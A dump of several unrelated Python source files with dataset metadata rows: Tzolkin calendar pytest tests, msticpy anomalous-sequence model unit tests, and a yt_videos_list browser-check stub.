pytest.param(
"01.01.2000", local_reference_dates["01.01.2000"], id="01.01.2000"
),
pytest.param(
"06.07.2005", local_reference_dates["06.07.2005"], id="06.07.2005"
),
pytest.param(
"01.10.2017", local_reference_dates["01.10.2017"], id="01.10.2017"
),
pytest.param(
"20.03.2021", local_reference_dates["20.03.2021"], id="20.03.2021"
),
],
)
def test_getTzolkinYearDay(gregorian: str, tzolkin: TzolkinDate) -> None:
"""Test `Tzolkin.getTzolkinYearDay`."""
gregorian_date = datetime.datetime.strptime(gregorian, USED_DATEFMT).date()
to_test = Tzolkin.fromDate(gregorian_date)
assert to_test.getTzolkinYearDay() == getTzolkinDay(tzolkin) # nosec
################################################################################
@pytest.mark.parametrize(
"gregorian,tzolkin",
[
pytest.param(
"01.01.1800", local_reference_dates["01.01.1800"], id="01.01.1800"
),
pytest.param(
"12.12.1926", local_reference_dates["12.12.1926"], id="12.12.1926"
),
pytest.param(
"26.01.1958", local_reference_dates["26.01.1958"], id="26.01.1958"
),
pytest.param(
"15.03.1967", local_reference_dates["15.03.1967"], id="15.03.1967"
),
pytest.param(
"01.01.1970", local_reference_dates["01.01.1970"], id="01.01.1970"
),
pytest.param(
"08.05.1975", local_reference_dates["08.05.1975"], id="08.05.1975"
),
pytest.param(
"17.02.1978", local_reference_dates["17.02.1978"], id="17.02.1978"
),
pytest.param(
"25.10.1986", local_reference_dates["25.10.1986"], id="25.10.1986"
),
pytest.param(
"13.05.1992", local_reference_dates["13.05.1992"], id="13.05.1992"
),
pytest.param(
"08.11.1997", local_reference_dates["08.11.1997"], id="08.11.1997"
),
pytest.param(
"01.01.2000", local_reference_dates["01.01.2000"], id="01.01.2000"
),
pytest.param(
"06.07.2005", local_reference_dates["06.07.2005"], id="06.07.2005"
),
pytest.param(
"01.10.2017", local_reference_dates["01.10.2017"], id="01.10.2017"
),
pytest.param(
"20.03.2021", local_reference_dates["20.03.2021"], id="20.03.2021"
),
],
)
def test_getNextDate(gregorian: str, tzolkin: TzolkinDate) -> None:
"""Test `Tzolkin.getNextDate`."""
gregorian_date = datetime.datetime.strptime(
gregorian, USED_DATEFMT
).date() - datetime.timedelta(days=1)
to_test = Tzolkin.fromDateString(date_str=gregorian, fmt=USED_DATEFMT)
assert to_test.getNextDate(start_date=gregorian_date) == nextTzolkin( # nosec
tzolkin=tzolkin, starting=gregorian_date
)
################################################################################
@pytest.mark.parametrize(
"gregorian,tzolkin",
[
pytest.param(
"01.01.1800", local_reference_dates["01.01.1800"], id="01.01.1800"
),
pytest.param(
"12.12.1926", local_reference_dates["12.12.1926"], id="12.12.1926"
),
pytest.param(
"26.01.1958", local_reference_dates["26.01.1958"], id="26.01.1958"
),
pytest.param(
"15.03.1967", local_reference_dates["15.03.1967"], id="15.03.1967"
),
pytest.param(
"01.01.1970", local_reference_dates["01.01.1970"], id="01.01.1970"
),
pytest.param(
"08.05.1975", local_reference_dates["08.05.1975"], id="08.05.1975"
),
pytest.param(
"17.02.1978", local_reference_dates["17.02.1978"], id="17.02.1978"
),
pytest.param(
"25.10.1986", local_reference_dates["25.10.1986"], id="25.10.1986"
),
pytest.param(
"13.05.1992", local_reference_dates["13.05.1992"], id="13.05.1992"
),
pytest.param(
"08.11.1997", local_reference_dates["08.11.1997"], id="08.11.1997"
),
pytest.param(
"01.01.2000", local_reference_dates["01.01.2000"], id="01.01.2000"
),
pytest.param(
"06.07.2005", local_reference_dates["06.07.2005"], id="06.07.2005"
),
pytest.param(
"01.10.2017", local_reference_dates["01.10.2017"], id="01.10.2017"
),
pytest.param(
"20.03.2021", local_reference_dates["20.03.2021"], id="20.03.2021"
),
],
)
def test_getNextDateToday(gregorian: str, tzolkin: TzolkinDate) -> None:
"""Test `Tzolkin.getNextDate`."""
to_test = Tzolkin.fromDateString(date_str=gregorian, fmt=USED_DATEFMT)
assert to_test.getNextDate() == nextTzolkin( # nosec
tzolkin=tzolkin, starting=datetime.date.today()
)
################################################################################
@pytest.mark.parametrize(
"gregorian,tzolkin",
[
pytest.param(
"01.01.1800", local_reference_dates["01.01.1800"], id="01.01.1800"
),
pytest.param(
"12.12.1926", local_reference_dates["12.12.1926"], id="12.12.1926"
),
pytest.param(
"26.01.1958", local_reference_dates["26.01.1958"], id="26.01.1958"
),
pytest.param(
"15.03.1967", local_reference_dates["15.03.1967"], id="15.03.1967"
),
pytest.param(
"01.01.1970", local_reference_dates["01.01.1970"], id="01.01.1970"
),
pytest.param(
"08.05.1975", local_reference_dates["08.05.1975"], id="08.05.1975"
),
pytest.param(
"17.02.1978", local_reference_dates["17.02.1978"], id="17.02.1978"
),
pytest.param(
"25.10.1986", local_reference_dates["25.10.1986"], id="25.10.1986"
),
pytest.param(
"13.05.1992", local_reference_dates["13.05.1992"], id="13.05.1992"
),
pytest.param(
"08.11.1997", local_reference_dates["08.11.1997"], id="08.11.1997"
),
pytest.param(
"01.01.2000", local_reference_dates["01.01.2000"], id="01.01.2000"
),
pytest.param(
"06.07.2005", local_reference_dates["06.07.2005"], id="06.07.2005"
),
pytest.param(
"01.10.2017", local_reference_dates["01.10.2017"], id="01.10.2017"
),
pytest.param(
"20.03.2021", local_reference_dates["20.03.2021"], id="20.03.2021"
),
],
)
def test_getNextDateList(gregorian: str, tzolkin: TzolkinDate) -> None:
"""Test `Tzolkin.getNextDateList`."""
gregorian_date = datetime.datetime.strptime(
gregorian, USED_DATEFMT
).date() - datetime.timedelta(days=1)
to_test = Tzolkin.fromDateString(date_str=gregorian, fmt=USED_DATEFMT)
tz_list = to_test.getNextDateList(start_date=gregorian_date)
good_list = tzolkin2gregorian(
tzolkin=tzolkin, start=gregorian_date, num_results=50, forward=True
)
assert len(tz_list) == 50 # nosec
for idx in range(0, len(good_list)):
assert tz_list[idx] == good_list[idx] # nosec
################################################################################
@pytest.mark.parametrize(
"gregorian,tzolkin",
[
pytest.param(
"01.01.1800", local_reference_dates["01.01.1800"], id="01.01.1800"
),
pytest.param(
"12.12.1926", local_reference_dates["12.12.1926"], id="12.12.1926"
),
pytest.param(
"26.01.1958", local_reference_dates["26.01.1958"], id="26.01.1958"
),
pytest.param(
"15.03.1967", local_reference_dates["15.03.1967"], id="15.03.1967"
),
pytest.param(
"01.01.1970", local_reference_dates["01.01.1970"], id="01.01.1970"
),
pytest.param(
"08.05.1975", local_reference_dates["08.05.1975"], id="08.05.1975"
),
pytest.param(
"17.02.1978", local_reference_dates["17.02.1978"], id="17.02.1978"
),
pytest.param(
"25.10.1986", local_reference_dates["25.10.1986"], id="25.10.1986"
),
pytest.param(
"13.05.1992", local_reference_dates["13.05.1992"], id="13.05.1992"
),
pytest.param(
"08.11.1997", local_reference_dates["08.11.1997"], id="08.11.1997"
),
pytest.param(
"01.01.2000", local_reference_dates["01.01.2000"], id="01.01.2000"
),
pytest.param(
"06.07.2005", local_reference_dates["06.07.2005"], id="06.07.2005"
),
pytest.param(
"01.10.2017", local_reference_dates["01.10.2017"], id="01.10.2017"
),
pytest.param(
"20.03.2021", local_reference_dates["20.03.2021"], id="20.03.2021"
),
],
)
def test_getLastDate(gregorian: str, tzolkin: TzolkinDate) -> None:
"""Test `Tzolkin.getLastDate`."""
gregorian_date = datetime.datetime.strptime(
gregorian, USED_DATEFMT
).date() + datetime.timedelta(days=1)
to_test = Tzolkin.fromDateString(date_str=gregorian, fmt=USED_DATEFMT)
assert to_test.getLastDate(start_date=gregorian_date) == lastTzolkin( # nosec
tzolkin=tzolkin, starting=gregorian_date
)
################################################################################
@pytest.mark.parametrize(
"gregorian,tzolkin",
[
pytest.param(
"01.01.1800", local_reference_dates["01.01.1800"], id="01.01.1800"
),
pytest.param(
"12.12.1926", local_reference_dates["12.12.1926"], id="12.12.1926"
),
pytest.param(
"26.01.1958", local_reference_dates["26.01.1958"], id="26.01.1958"
),
pytest.param(
"15.03.1967", local_reference_dates["15.03.1967"], id="15.03.1967"
),
pytest.param(
"01.01.1970", local_reference_dates["01.01.1970"], id="01.01.1970"
),
pytest.param(
"08.05.1975", local_reference_dates["08.05.1975"], id="08.05.1975"
),
pytest.param(
"17.02.1978", local_reference_dates["17.02.1978"], id="17.02.1978"
),
pytest.param(
"25.10.1986", local_reference_dates["25.10.1986"], id="25.10.1986"
),
pytest.param(
"13.05.1992", local_reference_dates["13.05.1992"], id="13.05.1992"
),
pytest.param(
"08.11.1997", local_reference_dates["08.11.1997"], id="08.11.1997"
),
pytest.param(
"01.01.2000", local_reference_dates["01.01.2000"], id="01.01.2000"
),
pytest.param(
"06.07.2005", local_reference_dates["06.07.2005"], id="06.07.2005"
),
pytest.param(
"01.10.2017", local_reference_dates["01.10.2017"], id="01.10.2017"
),
pytest.param(
"20.03.2021", local_reference_dates["20.03.2021"], id="20.03.2021"
),
],
)
def test_getLastDateToday(gregorian: str, tzolkin: TzolkinDate) -> None:
"""Test `Tzolkin.getLastDate`."""
to_test = Tzolkin.fromDateString(date_str=gregorian, fmt=USED_DATEFMT)
assert to_test.getLastDate() == lastTzolkin( # nosec
tzolkin=tzolkin, starting=datetime.date.today()
)
################################################################################
@pytest.mark.parametrize(
"gregorian,tzolkin",
[
pytest.param(
"01.01.1800", local_reference_dates["01.01.1800"], id="01.01.1800"
),
pytest.param(
"12.12.1926", local_reference_dates["12.12.1926"], id="12.12.1926"
),
pytest.param(
"26.01.1958", local_reference_dates["26.01.1958"], id="26.01.1958"
),
pytest.param(
"15.03.1967", local_reference_dates["15.03.1967"], id="15.03.1967"
),
pytest.param(
"01.01.1970", local_reference_dates["01.01.1970"], id="01.01.1970"
),
pytest.param(
"08.05.1975", local_reference_dates["08.05.1975"], id="08.05.1975"
),
pytest.param(
"17.02.1978", local_reference_dates["17.02.1978"], id="17.02.1978"
),
pytest.param(
"25.10.1986", local_reference_dates["25.10.1986"], id="25.10.1986"
),
pytest.param(
"13.05.1992", local_reference_dates["13.05.1992"], id="13.05.1992"
),
pytest.param(
"08.11.1997", local_reference_dates["08.11.1997"], id="08.11.1997"
),
pytest.param(
"01.01.2000", local_reference_dates["01.01.2000"], id="01.01.2000"
),
pytest.param(
"06.07.2005", local_reference_dates["06.07.2005"], id="06.07.2005"
),
pytest.param(
"01.10.2017", local_reference_dates["01.10.2017"], id="01.10.2017"
),
pytest.param(
"20.03.2021", local_reference_dates["20.03.2021"], id="20.03.2021"
),
],
)
def test_getLastDateList(gregorian: str, tzolkin: TzolkinDate) -> None:
"""Test `Tzolkin.getLastDateList`."""
gregorian_date = datetime.datetime.strptime(
gregorian, USED_DATEFMT
).date() - datetime.timedelta(days=1)
to_test = Tzolkin.fromDateString(date_str=gregorian, fmt=USED_DATEFMT)
tz_list = to_test.getLastDateList(start_date=gregorian_date)
good_list = tzolkin2gregorian(
tzolkin=tzolkin, start=gregorian_date, num_results=50, forward=False
)
assert len(tz_list) == 50 # nosec
for idx in range(0, len(good_list)):
assert tz_list[idx] == good_list[idx] # nosec
################################################################################
@settings(max_examples=50, deadline=None)
@given(days=st.integers(min_value=1, max_value=260))
@pytest.mark.parametrize(
"gregorian,tzolkin",
[
pytest.param(
"01.01.1800", local_reference_dates["01.01.1800"], id="01.01.1800"
),
pytest.param(
"12.12.1926", local_reference_dates["12.12.1926"], id="12.12.1926"
),
pytest.param(
"26.01.1958", local_reference_dates["26.01.1958"], id="26.01.1958"
),
pytest.param(
"15.03.1967", local_reference_dates["15.03.1967"], id="15.03.1967"
),
pytest.param(
"01.01.1970", local_reference_dates["01.01.1970"], id="01.01.1970"
),
pytest.param(
"08.05.1975", local_reference_dates["08.05.1975"], id="08.05.1975"
),
pytest.param(
"17.02.1978", local_reference_dates["17.02.1978"], id="17.02.1978"
),
pytest.param(
"25.10.1986", local_reference_dates["25.10.1986"], id="25.10.1986"
),
pytest.param(
"13.05.1992", local_reference_dates["13.05.1992"], id="13.05.1992"
),
pytest.param(
"08.11.1997", local_reference_dates["08.11.1997"], id="08.11.1997"
),
pytest.param(
"01.01.2000", local_reference_dates["01.01.2000"], id="01.01.2000"
),
pytest.param(
"06.07.2005", local_reference_dates["06.07.2005"], id="06.07.2005"
),
pytest.param(
"01.10.2017", local_reference_dates["01.10.2017"], id="01.10.2017"
),
pytest.param(
"20.03.2021", local_reference_dates["20.03.2021"], id="20.03.2021"
),
],
)
def test_addDays(gregorian: str, tzolkin: TzolkinDate, days: int) -> None:
"""Test `Tzolkin.addTimedelta`."""
gregorian_date = datetime.datetime.strptime(gregorian, USED_DATEFMT).date()
tzolkin_start = Tzolkin.fromDate(date=gregorian_date).getTzolkinDate()
assert tzolkin_start.number == tzolkin.number # nosec
assert tzolkin_start.name == tzolkin.name # nosec
tzolkin_add = Tzolkin.fromDate(date=gregorian_date).addDays(days).getTzolkinDate()
assert getTzolkinDiff(tzolkin_start, tzolkin_add) == days # nosec
################################################################################
@settings(max_examples=50, deadline=None)
@given(days=st.integers(min_value=1, max_value=260))
@pytest.mark.parametrize(
"gregorian,tzolkin",
[
pytest.param(
"01.01.1800", local_reference_dates["01.01.1800"], id="01.01.1800"
),
pytest.param(
"12.12.1926", local_reference_dates["12.12.1926"], id="12.12.1926"
),
pytest.param(
"26.01.1958", local_reference_dates["26.01.1958"], id="26.01.1958"
),
pytest.param(
"15.03.1967", local_reference_dates["15.03.1967"], id="15.03.1967"
),
pytest.param(
"01.01.1970", local_reference_dates["01.01.1970"], id="01.01.1970"
),
pytest.param(
"08.05.1975", local_reference_dates["08.05.1975"], id="08.05.1975"
),
pytest.param(
"17.02.1978", local_reference_dates["17.02.1978"], id="17.02.1978"
),
pytest.param(
"25.10.1986", local_reference_dates["25.10.1986"], id="25.10.1986"
),
pytest.param(
"13.05.1992", local_reference_dates["13.05.1992"], id="13.05.1992"
),
pytest.param(
"08.11.1997", local_reference_dates["08.11.1997"], id="08.11.1997"
),
pytest.param(
"01.01.2000", local_reference_dates["01.01.2000"], id="01.01.2000"
),
pytest.param(
"06.07.2005", local_reference_dates["06.07.2005"], id="06.07.2005"
),
pytest.param(
"01.10.2017", local_reference_dates["01.10.2017"], id="01.10.2017"
),
pytest.param(
"20.03.2021", local_reference_dates["20.03.2021"], id="20.03.2021"
),
],
)
def test_addTimedelta(gregorian: str, tzolkin: TzolkinDate, days: int) -> None:
"""Test `Tzolkin.addTimedelta`."""
gregorian_date = datetime.datetime.strptime(gregorian, USED_DATEFMT).date()
tzolkin_start = Tzolkin.fromDate(date=gregorian_date).getTzolkinDate()
assert tzolkin_start.number == tzolkin.number # nosec
assert tzolkin_start.name == tzolkin.name # nosec
tzolkin_add = (
Tzolkin.fromDate(date=gregorian_date)
.addTimedelta(datetime.timedelta(days=days))
.getTzolkinDate()
)
assert getTzolkinDiff(tzolkin_start, tzolkin_add) == days # nosec
################################################################################
@settings(max_examples=50, deadline=None)
@given(days=st.integers(min_value=1, max_value=260))
@pytest.mark.parametrize(
"gregorian,tzolkin",
[
pytest.param(
"01.01.1800", local_reference_dates["01.01.1800"], id="01.01.1800"
),
pytest.param(
"12.12.1926", local_reference_dates["12.12.1926"], id="12.12.1926"
),
pytest.param(
"26.01.1958", local_reference_dates["26.01.1958"], id="26.01.1958"
),
pytest.param(
"15.03.1967", local_reference_dates["15.03.1967"], id="15.03.1967"
),
pytest.param(
"01.01.1970", local_reference_dates["01.01.1970"], id="01.01.1970"
),
pytest.param(
"08.05.1975", local_reference_dates["08.05.1975"], id="08.05.1975"
),
pytest.param(
"17.02.1978", local_reference_dates["17.02.1978"], id="17.02.1978"
),
pytest.param(
"25.10.1986", local_reference_dates["25.10.1986"], id="25.10.1986"
),
pytest.param(
"13.05.1992", local_reference_dates["13.05.1992"], id="13.05.1992"
),
pytest.param(
"08.11.1997", local_reference_dates["08.11.1997"], id="08.11.1997"
),
pytest.param(
"01.01.2000", local_reference_dates["01.01.2000"], id="01.01.2000"
),
pytest.param(
"06.07.2005", local_reference_dates["06.07.2005"], id="06.07.2005"
),
pytest.param(
"01.10.2017", local_reference_dates["01.10.2017"], id="01.10.2017"
),
pytest.param(
"20.03.2021", local_reference_dates["20.03.2021"], id="20.03.2021"
),
],
)
def test_getDayDiff(gregorian: str, tzolkin: TzolkinDate, days: int) -> None:
"""Test `Tzolkin.getDayDiff`."""
gregorian_date = datetime.datetime.strptime(gregorian, USED_DATEFMT).date()
tzolkin_start = Tzolkin.fromDate(date=gregorian_date)
assert tzolkin_start.getTzolkinDate().number == tzolkin.number # nosec
assert tzolkin_start.getTzolkinDate().name == tzolkin.name # nosec
tzolkin_add = Tzolkin.fromDate(date=gregorian_date).addTimedelta(
datetime.timedelta(days=days)
)
assert tzolkin_start.getDayDiff(other=tzolkin_add) == days # nosec
################################################################################
@settings(max_examples=50, deadline=None)
@given(days=st.integers(min_value=1, max_value=260))
@pytest.mark.parametrize(
"gregorian,tzolkin",
[
pytest.param(
"01.01.1800", local_reference_dates["01.01.1800"], id="01.01.1800"
),
pytest.param(
"12.12.1926", local_reference_dates["12.12.1926"], id="12.12.1926"
),
pytest.param(
"26.01.1958", local_reference_dates["26.01.1958"], id="26.01.1958"
),
pytest.param(
"15.03.1967", local_reference_dates["15.03.1967"], id="15.03.1967"
),
pytest.param(
"01.01.1970", local_reference_dates["01.01.1970"], id="01.01.1970"
),
pytest.param(
"08.05.1975", local_reference_dates["08.05.1975"], id="08.05.1975"
),
pytest.param(
"17.02.1978", local_reference_dates["17.02.1978"], id="17.02.1978"
),
pytest.param(
"25.10.1986", local_reference_dates["25.10.1986"], id="25.10.1986"
),
pytest.param(
"13.05.1992", local_reference_dates["13.05.1992"], id="13.05.1992"
),
pytest.param(
"08.11.1997", local_reference_dates["08.11.1997"], id="08.11.1997"
),
pytest.param(
"01.01.2000", local_reference_dates["01.01.2000"], id="01.01.2000"
),
pytest.param(
"06.07.2005", local_reference_dates["06.07.2005"], id="06.07.2005"
),
pytest.param(
"01.10.2017", local_reference_dates["01.10.2017"], id="01.10.2017"
),
pytest.param(
"20.03.2021", local_reference_dates["20.03.2021"], id="20.03.2021"
),
],
)
def test_getDayTimedelta(gregorian: str, tzolkin: TzolkinDate, days: int) -> None:
"""Test `Tzolkin.getDayTimedelta`."""
gregorian_date = datetime.datetime.strptime(gregorian, USED_DATEFMT).date()
tzolkin_start = Tzolkin.fromDate(date=gregorian_date)
assert tzolkin_start.getTzolkinDate().number == tzolkin.number # nosec
assert tzolkin_start.getTzolkinDate().name == tzolkin.name # nosec
tzolkin_add = Tzolkin.fromDate(date=gregorian_date).addTimedelta(
datetime.timedelta(days=days)
)
assert tzolkin_start.getDayTimedelta(other=tzolkin_add).days == days # nosec
################################################################################
def test_getNameNumberFromName() -> None:
"""Test `Tzolkin.getNameNumberFromName`."""
for number in day_names:
assert ( # nosec
Tzolkin.getNameNumberFromName(name_str=day_names[number]) == number
)
################################################################################
def test_getNameNumberFromNameExc() -> None:
"""Test `Tzolkin.getNameNumberFromName`, raises excpention."""
with pytest.raises(TzolkinException) as excp:
Tzolkin.getNameNumberFromName(name_str="BLA")
assert excp # nosec
################################################################################
def test_getTzolkinCalendar() -> None:
"""Test `Tzolkin.getTzolkinCalendar`."""
calendar = Tzolkin.getTzolkinCalendar()
tzolkin_dict = makeLookUpTable()
assert len(calendar) == 260 # nosec
for key in tzolkin_dict:
assert calendar[key - 1] == "{number} {name}".format( # nosec
number=tzolkin_dict[key].number, name=day_names[tzolkin_dict[key].name]
)
################################################################################
@pytest.mark.parametrize(
"gregorian,tzolkin",
[
pytest.param(
"01.01.1800", local_reference_dates["01.01.1800"], id="01.01.1800"
),
pytest.param(
"12.12.1926", local_reference_dates["12.12.1926"], id="12.12.1926"
),
pytest.param(
"26.01.1958", local_reference_dates["26.01.1958"], id="26.01.1958"
),
pytest.param(
"15.03.1967", local_reference_dates["15.03.1967"], id="15.03.1967"
),
pytest.param(
"01.01.1970", local_reference_dates["01.01.1970"], id="01.01.1970"
),
pytest.param(
"08.05.1975", local_reference_dates["08.05.1975"], id="08.05.1975"
),
pytest.param(
"17.02.1978", local_reference_dates["17.02.1978"], id="17.02.1978"
),
pytest.param(
"25.10.1986", local_reference_dates["25.10.1986"], id="25.10.1986"
),
pytest.param(
"13.05.1992", local_reference_dates["13.05.1992"], id="13.05.1992"
),
pytest.param(
"08.11.1997", local_reference_dates["08.11.1997"], id="08.11.1997"
),
pytest.param(
"01.01.2000", local_reference_dates["01.01.2000"], id="01.01.2000"
),
pytest.param(
"06.07.2005", local_reference_dates["06.07.2005"], id="06.07.2005"
),
pytest.param(
"01.10.2017", local_reference_dates["01.10.2017"], id="01.10.2017"
),
pytest.param(
"20.03.2021", local_reference_dates["20.03.2021"], id="20.03.2021"
),
],
)
def test_print(gregorian: str, tzolkin: TzolkinDate) -> None:
"""Test `Tzolkin.__repr__()`."""
to_test = Tzolkin.fromDateString(date_str=gregorian, fmt=USED_DATEFMT)
assert to_test.__repr__() == tzolkin.__repr__() # nosec
| 37.097915
| 86
| 0.549916
| 4,973
| 40,919
| 4.386688
| 0.037603
| 0.153381
| 0.20816
| 0.066422
| 0.889617
| 0.88187
| 0.87504
| 0.854412
| 0.844144
| 0.836489
| 0
| 0.191476
| 0.243139
| 40,919
| 1,102
| 87
| 37.131579
| 0.512916
| 0.031868
| 0
| 0.857143
| 0
| 0
| 0.202138
| 0
| 0
| 0
| 0
| 0
| 0.041247
| 1
| 0.024145
| false
| 0
| 0.008048
| 0
| 0.032193
| 0.001006
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
74e30aa7b5127ad9c144ab287ebe19ae8353d417
| 6,979
|
py
|
Python
|
tests/analysis/test_anom_seq_model.py
|
kubajir/msticpy
|
7b319b71b191b5f75dcf9afd87492523a74b5ad7
|
[
"MIT"
] | 820
|
2019-05-16T07:24:34.000Z
|
2022-03-31T09:18:10.000Z
|
tests/analysis/test_anom_seq_model.py
|
kubajir/msticpy
|
7b319b71b191b5f75dcf9afd87492523a74b5ad7
|
[
"MIT"
] | 205
|
2019-06-24T19:24:19.000Z
|
2022-03-30T23:13:46.000Z
|
tests/analysis/test_anom_seq_model.py
|
kubajir/msticpy
|
7b319b71b191b5f75dcf9afd87492523a74b5ad7
|
[
"MIT"
] | 171
|
2019-06-23T13:53:12.000Z
|
2022-03-29T18:22:46.000Z
|
import unittest
from msticpy.analysis.anomalous_sequence.utils.data_structures import Cmd
from msticpy.analysis.anomalous_sequence.model import Model
from msticpy.common.exceptions import MsticpyException
class TestModel(unittest.TestCase):
def setUp(self) -> None:
self.sessions1 = [
["Set-User", "Set-User"],
["Set-Mailbox", "Set-User", "Set-User"],
]
self.sessions2 = [
[
Cmd("Set-User", {"Identity"}),
Cmd("Set-User", {"Identity", "City", "Name"}),
],
[
Cmd("Set-Mailbox", {"Identity"}),
Cmd("Set-User", {"Identity", "City"}),
Cmd("Set-User", {"Identity"}),
],
]
self.sessions3 = [
[
Cmd("Set-User", {"Identity": "blah"}),
Cmd("Set-User", {"Identity": "haha", "City": "york", "Name": "bob"}),
],
[
Cmd("Set-Mailbox", {"Identity": "blah"}),
Cmd("Set-User", {"Identity": "blah", "City": "london"}),
Cmd("Set-User", {"Identity": "haha"}),
],
]
def tearDown(self) -> None:
self.sessions1 = None
self.sessions2 = None
self.sessions3 = None
def test__init__(self):
self.assertRaises(MsticpyException, lambda: Model(sessions=[]))
self.assertRaises(MsticpyException, lambda: Model(sessions=[[]]))
self.assertRaises(MsticpyException, lambda: Model(sessions=["Set-User"]))
self.assertRaises(MsticpyException, lambda: Model(sessions=[["Set-User"], []]))
self.assertRaises(
Exception, lambda: Model(sessions=[[{"Set-User": {"Identity"}}]])
)
def test_train(self):
model = Model(sessions=self.sessions1)
model.train()
self.assertTrue(model.seq1_counts is not None)
self.assertTrue(model.seq2_counts is not None)
self.assertTrue(model.prior_probs is not None)
self.assertTrue(model.trans_probs is not None)
self.assertTrue(model.param_counts is None)
self.assertTrue(model.cmd_param_counts is None)
self.assertTrue(model.param_probs is None)
self.assertTrue(model.param_cond_cmd_probs is None)
self.assertTrue(model.value_counts is None)
self.assertTrue(model.param_value_counts is None)
self.assertTrue(model.value_probs is None)
self.assertTrue(model.value_cond_param_probs is None)
self.assertTrue(model.modellable_params is None)
model = Model(sessions=self.sessions2)
model.train()
self.assertTrue(model.seq1_counts is not None)
self.assertTrue(model.seq2_counts is not None)
self.assertTrue(model.prior_probs is not None)
self.assertTrue(model.trans_probs is not None)
self.assertTrue(model.param_counts is not None)
self.assertTrue(model.cmd_param_counts is not None)
self.assertTrue(model.param_probs is not None)
self.assertTrue(model.param_cond_cmd_probs is not None)
self.assertTrue(model.value_counts is None)
self.assertTrue(model.param_value_counts is None)
self.assertTrue(model.value_probs is None)
self.assertTrue(model.value_cond_param_probs is None)
self.assertTrue(model.modellable_params is None)
model = Model(sessions=self.sessions3)
model.train()
self.assertTrue(model.seq1_counts is not None)
self.assertTrue(model.seq2_counts is not None)
self.assertTrue(model.prior_probs is not None)
self.assertTrue(model.trans_probs is not None)
self.assertTrue(model.param_counts is not None)
self.assertTrue(model.cmd_param_counts is not None)
self.assertTrue(model.param_probs is not None)
self.assertTrue(model.param_cond_cmd_probs is not None)
self.assertTrue(model.value_counts is not None)
self.assertTrue(model.param_value_counts is not None)
self.assertTrue(model.value_probs is not None)
self.assertTrue(model.value_cond_param_probs is not None)
self.assertTrue(model.modellable_params is not None)
def test_compute_setof_params_cond_cmd(self):
model = Model(sessions=self.sessions1)
model.train()
self.assertRaises(
Exception, lambda: model.compute_setof_params_cond_cmd(use_geo_mean=False)
)
model = Model(sessions=self.sessions2)
model.train()
model.compute_setof_params_cond_cmd(use_geo_mean=False)
self.assertTrue(len(model.set_params_cond_cmd_probs) > 0)
model = Model(sessions=self.sessions3)
model.train()
model.compute_setof_params_cond_cmd(use_geo_mean=False)
self.assertTrue(len(model.set_params_cond_cmd_probs) > 0)
model = Model(sessions=self.sessions3)
self.assertRaises(
Exception, lambda: model.compute_setof_params_cond_cmd(use_geo_mean=False)
)
def test_compute_scores(self):
model = Model(sessions=self.sessions3)
self.assertRaises(
MsticpyException, lambda: model.compute_scores(use_start_end_tokens=True)
)
model.train()
model.compute_scores(use_start_end_tokens=True)
self.assertTrue(model.session_likelihoods is not None)
self.assertTrue(model.session_geomean_likelihoods is not None)
self.assertTrue(2 in model.rare_window_likelihoods)
self.assertTrue(3 in model.rare_window_likelihoods)
self.assertTrue(2 in model.rare_windows)
self.assertTrue(3 in model.rare_windows)
def test_compute_likelihoods_of_sessions(self):
model = Model(sessions=self.sessions3)
self.assertRaises(
MsticpyException,
lambda: model.compute_likelihoods_of_sessions(use_start_end_tokens=True),
)
model.train()
model.compute_likelihoods_of_sessions(use_start_end_tokens=True)
self.assertTrue(model.session_likelihoods is not None)
def test_compute_rarest_windows(self):
model = Model(sessions=self.sessions2)
self.assertRaises(
MsticpyException,
lambda: model.compute_rarest_windows(
window_len=3, use_start_end_tokens=True, use_geo_mean=False
),
)
model.train()
model.compute_rarest_windows(
window_len=3, use_start_end_tokens=True, use_geo_mean=False
)
self.assertTrue(3 in model.rare_window_likelihoods)
self.assertTrue(3 in model.rare_windows)
model = Model(sessions=self.sessions2)
model.train()
model.compute_rarest_windows(
window_len=3, use_start_end_tokens=True, use_geo_mean=True
)
self.assertTrue(3 in model.rare_window_likelihoods_geo)
self.assertTrue(3 in model.rare_windows_geo)
if __name__ == "__main__":
unittest.main()
| 39.88
| 87
| 0.64995
| 835
| 6,979
| 5.215569
| 0.100599
| 0.167164
| 0.183238
| 0.195408
| 0.876234
| 0.83031
| 0.770838
| 0.736625
| 0.6907
| 0.626177
| 0
| 0.00686
| 0.24803
| 6,979
| 174
| 88
| 40.109195
| 0.82298
| 0
| 0
| 0.529412
| 0
| 0
| 0.043846
| 0
| 0
| 0
| 0
| 0
| 0.405229
| 1
| 0.052288
| false
| 0
| 0.026144
| 0
| 0.084967
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
74fef52e65af6b2e2da81eef2f283c35a83e60c8
| 408
|
py
|
Python
|
python/yt_videos_list/download/selenium_linux.py
|
Shail-Shouryya/automate_YouTube-Channel-Videos-List
|
b63bbebb7caacc5e99ebf5dc95387d505069953d
|
[
"Apache-2.0"
] | null | null | null |
python/yt_videos_list/download/selenium_linux.py
|
Shail-Shouryya/automate_YouTube-Channel-Videos-List
|
b63bbebb7caacc5e99ebf5dc95387d505069953d
|
[
"Apache-2.0"
] | null | null | null |
python/yt_videos_list/download/selenium_linux.py
|
Shail-Shouryya/automate_YouTube-Channel-Videos-List
|
b63bbebb7caacc5e99ebf5dc95387d505069953d
|
[
"Apache-2.0"
] | null | null | null |
def verify_browser_exists(browser):
raise RuntimeError('Browser detection and automatic selenium updates are not yet available for Linux distributions!\nPlease update your selenium driver manually.')
def get_browser_version(browser):
raise RuntimeError('Browser version detection and automatic selenium updates are not yet available for Linux distributions!\nPlease update your selenium driver manually.')
| 81.6
| 172
| 0.840686
| 53
| 408
| 6.396226
| 0.471698
| 0.070796
| 0.141593
| 0.182891
| 0.672566
| 0.672566
| 0.672566
| 0.672566
| 0.672566
| 0.672566
| 0
| 0
| 0.110294
| 408
| 4
| 173
| 102
| 0.933884
| 0
| 0
| 0
| 0
| 0.5
| 0.710784
| 0.107843
| 0
| 0
| 0
| 0
| 0
